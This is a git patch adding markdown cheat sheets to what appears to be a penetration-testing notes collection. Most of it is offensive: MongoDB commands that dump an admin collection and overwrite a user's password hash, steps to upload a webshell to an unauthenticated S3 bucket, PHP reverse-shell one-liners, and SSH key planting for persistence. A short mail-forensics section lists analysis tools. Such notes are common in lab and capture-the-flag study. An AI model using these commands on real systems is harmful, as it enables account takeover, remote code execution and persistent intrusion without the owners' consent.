From 451631aefb900b869f81f92189a703c2add9feeb Mon Sep 17 00:00:00 2001 From: whx Date: Fri, 9 Dec 2022 00:00:02 +0100 Subject: [PATCH] added MongoDB specifics --- Exploits/Databases/MongoDB.md | 21 +++++++++++++++++++++ Exploits/Databases/NoSQL Injection.md | 2 ++ Exploits/Databases/S3.md | 25 +++++++++++++++++++++++++ Forensics/Mail.md | 16 ++++++++++++++++ Reverse Shells/Upgrade Shell.md | 13 +++++++++++++ 5 files changed, 77 insertions(+) create mode 100644 Exploits/Databases/MongoDB.md create mode 100644 Exploits/Databases/S3.md create mode 100644 Forensics/Mail.md diff --git a/Exploits/Databases/MongoDB.md b/Exploits/Databases/MongoDB.md new file mode 100644 index 0000000..d73b44d --- /dev/null +++ b/Exploits/Databases/MongoDB.md @@ -0,0 +1,21 @@ +# MongoDB + +* The cli tool is `mongo` +* [List Databases of the DBMS](https://www.mongodb.com/docs/manual/reference/command/listDatabases/) + +## List users + +```sh +mongo --port --eval "db.admin.find().forEach(printjson);" +``` + +## Update User Password + +* Generate new password via +```sh +mkpasswd -m SecretPassword123 +``` +* Use the generated password to update a user +```sh +mongo --port --eval 'db.admin.update({"_id": ObjectID("4711")},{$set:{"x_shadow":""}})' +``` diff --git a/Exploits/Databases/NoSQL Injection.md b/Exploits/Databases/NoSQL Injection.md index 105bd09..e510e86 100644 --- a/Exploits/Databases/NoSQL Injection.md +++ b/Exploits/Databases/NoSQL Injection.md @@ -4,12 +4,14 @@ * Examples are Elasticsearch, MongoDB, Redis, CouchDB. ## Querying + * Filter instead of SQL queries * [Redis docs](https://redis.io/documentation) * [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/) * [Elasticsearch docs](https://www.elastic.co/guide/index.html) ## Operators + * A precondition to the injection is to know the most common operators listed below ```sql $and diff --git a/Exploits/Databases/S3.md b/Exploits/Databases/S3.md new file mode 100644 index 0000000..d09bf73 --- /dev/null +++ b/Exploits/Databases/S3.md @@ -0,0 +1,25 @@ +# AWS S3 Buckets + +* `awscli` is the official tool + +## Configuration + +* An S3 bucket may not be configured to authenticte. Therefore the tool is configured with random credentials via `aws configure` + +* List the endpoint via +```sh +aws --endpoint=http://s3.example.com s3 ls +2022-12-08 21:06:33 example.com +``` + +* List the top level domain afterwards +```sh +aws --endpoint=http://s3.example.com s3 ls s3://example.com +2022-12-08 21:06:33 0 .htaccess +2022-12-08 21:06:33 1218 index.html +``` + +* Upload a (webshell) and execute +```sh +aws --endpoint=http://s3.example.com s3 cp monkey.php s3://example.com +``` diff --git a/Forensics/Mail.md b/Forensics/Mail.md new file mode 100644 index 0000000..cd1defd --- /dev/null +++ b/Forensics/Mail.md @@ -0,0 +1,16 @@ +# Mail Analysis and Forensics + +## Tools + +```sh +emlAnalyzer +``` + +## References + +* [Email reputation](https://emailrep.io) +* [Virustotal](https://virustotal.com) +* [Inquest](https://labs.inquest.net) +* [IPinfo](https://ipinfo.io) +* [URLscan](https://urlscan.io) +* [Talos](https://talosintelligence.com) diff --git a/Reverse Shells/Upgrade Shell.md b/Reverse Shells/Upgrade Shell.md index 0352057..7799bad 100644 --- a/Reverse Shells/Upgrade Shell.md +++ b/Reverse Shells/Upgrade Shell.md @@ -5,7 +5,9 @@ * [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/) ## Via interpreter + ### PHP + * reverse shell ```php php -r '$sock=fsockopen("", );exec("/bin/sh -i <&3 >&3 2>&3");' @@ -19,21 +21,29 @@ php -e 'exec "/bin/bash";' ``` ### Python + ```python python -c 'import pty; pty.spawn("/bin/bash")' ``` ### Perl + ```perl perl -e 'exec "/bin/sh";' ``` ### Script + ```sh /usr/bin/script -qc /bin/bash /dev/null ``` +or +```sh +script /dev/null -c bash +``` ## Next + 1. `ctrl` + `z` 2. `stty echo -raw` 3. `fg` @@ -41,12 +51,15 @@ perl -e 'exec "/bin/sh";' 5. `export TERM=xterm` ## Via SSH + * `ssh-keygen` * copy priv key and `chmod 600` * `cat id_rsa.pub > authorized_keys` on target ## As Code + ### PHP + ```sh &1|nc > /tmp/f') ?> ```